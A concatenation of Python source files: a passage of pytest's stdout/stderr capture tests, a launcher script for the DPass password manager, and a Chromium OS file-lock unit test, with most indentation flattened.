sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestCaptureAndPassthroughIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd=<UNSET> _state='done' tmpfile={!r}>".format(
cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
""" for TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n" """
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert repr(cap.in_) == "<FDCapture 0 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture", "TeeSysCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
    # Teardown report seems to have the capture for the whole process (setup, call, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"])
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value] # noqa: F821
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
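# --- Editor's sketch (not part of the original test suite) ---
# Outside of pytest, the capture helpers exercised above follow the same cycle: start
# capturing, write, read what was captured, stop. The MultiCapture API of the pytest
# version these tests target (start_capturing/readouterr/stop_capturing) is assumed.
def _demo_multicapture_cycle():
    cap = StdCapture()  # sys.stdout/sys.stderr replacement helper defined at the top of this file
    cap.start_capturing()
    print("hello")
    sys.stderr.write("world")
    out, err = cap.readouterr()
    cap.stop_capturing()
    assert out == "hello\n"
    assert err == "world"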
|
run.py
|
#!/usr/bin/env python
import argparse
import webbrowser
from multiprocessing import Process, Queue
from threading import Thread
import subprocess
from app import create_app
from app.utils.misc import get_os, get_executable
from app.utils.session_key import SessionKey
processes = {}
queue = Queue(5)
def main():
parser = argparse.ArgumentParser(description='DPass - Distributed & Decentralized Password Manager')
parser.add_argument('--develop', action='store_true', help='Run on development config.')
parser.add_argument('--use_ethereum', action='store_true', help='Launch Ethereum (geth)')
args = parser.parse_args()
app, socketio = create_app('development' if args.develop else 'production', queue,
'ethereum' if args.use_ethereum else 'local')
os = get_os()
if os == 'win32':
print('Windows 32-bit is not supported.')
exit(1)
if os.startswith('win'):
server = Thread(target=socketio.run, args=(app,), kwargs={'use_reloader': False}, daemon=True)
else:
server = Process(target=socketio.run, args=(app,), kwargs={'use_reloader': False})
if args.use_ethereum:
processes['geth'] = subprocess.Popen([get_executable('./geth', 'geth'),
'--datadir',
'./ethereum_private/data/',
'--ethash.dagdir',
'./ethereum_private/data/ethash',
'--networkid',
'1042',
'--targetgaslimit',
'4000000'
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
init_key = SessionKey.generate_key()
queue.put(init_key)
processes['server'] = server
server.start()
webbrowser.open_new_tab('http://localhost:5000/?key=' + init_key)
def terminate():
if isinstance(processes['server'], Process):
        # FIXME: consider terminating the server more gracefully
processes['server'].terminate()
processes['server'].join()
if 'geth' in processes:
processes['geth'].terminate()
queue.close()
if __name__ == '__main__':
try:
main()
while True:
input()
if not queue.empty():
print(queue.get())
except (EOFError, KeyboardInterrupt):
terminate()
|
file_lock_machine_test.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""lock_machine.py related unit-tests.
MachineTest tests file_lock_machine.Machine.
"""
from __future__ import print_function
__author__ = 'asharif@google.com (Ahmad Sharif)'
from multiprocessing import Process
import time
import unittest
import file_lock_machine
def LockAndSleep(machine):
file_lock_machine.Machine(machine, '/tmp', auto=True).Lock(exclusive=True)
time.sleep(1)
class MachineTest(unittest.TestCase):
"""Class for testing machine locking."""
def setUp(self):
pass
def testRepeatedUnlock(self):
mach = file_lock_machine.Machine('qqqraymes.mtv', '/tmp')
for _ in range(10):
self.assertTrue(mach.Unlock())
mach = file_lock_machine.Machine('qqqraymes.mtv', '/tmp', auto=True)
for _ in range(10):
self.assertTrue(mach.Unlock())
def testLockUnlock(self):
mach = file_lock_machine.Machine('otter.mtv', '/tmp')
for _ in range(10):
self.assertTrue(mach.Lock(exclusive=True))
self.assertTrue(mach.Unlock(exclusive=True))
mach = file_lock_machine.Machine('otter.mtv', '/tmp', True)
for _ in range(10):
self.assertTrue(mach.Lock(exclusive=True))
self.assertTrue(mach.Unlock(exclusive=True))
def testSharedLock(self):
mach = file_lock_machine.Machine('chrotomation.mtv', '/tmp')
for _ in range(10):
self.assertTrue(mach.Lock(exclusive=False))
for _ in range(10):
self.assertTrue(mach.Unlock(exclusive=False))
self.assertTrue(mach.Lock(exclusive=True))
self.assertTrue(mach.Unlock(exclusive=True))
